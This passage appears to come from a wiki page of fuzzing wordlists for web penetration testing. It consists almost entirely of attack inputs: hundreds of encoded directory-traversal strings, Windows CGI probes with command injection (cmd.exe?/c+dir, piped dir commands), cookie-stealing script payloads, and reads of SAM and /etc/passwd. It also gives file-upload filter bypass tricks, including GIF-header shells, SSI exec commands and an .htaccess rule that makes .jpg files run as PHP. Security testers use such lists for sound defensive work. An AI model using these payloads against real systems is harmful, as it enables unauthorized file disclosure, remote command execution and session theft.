..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
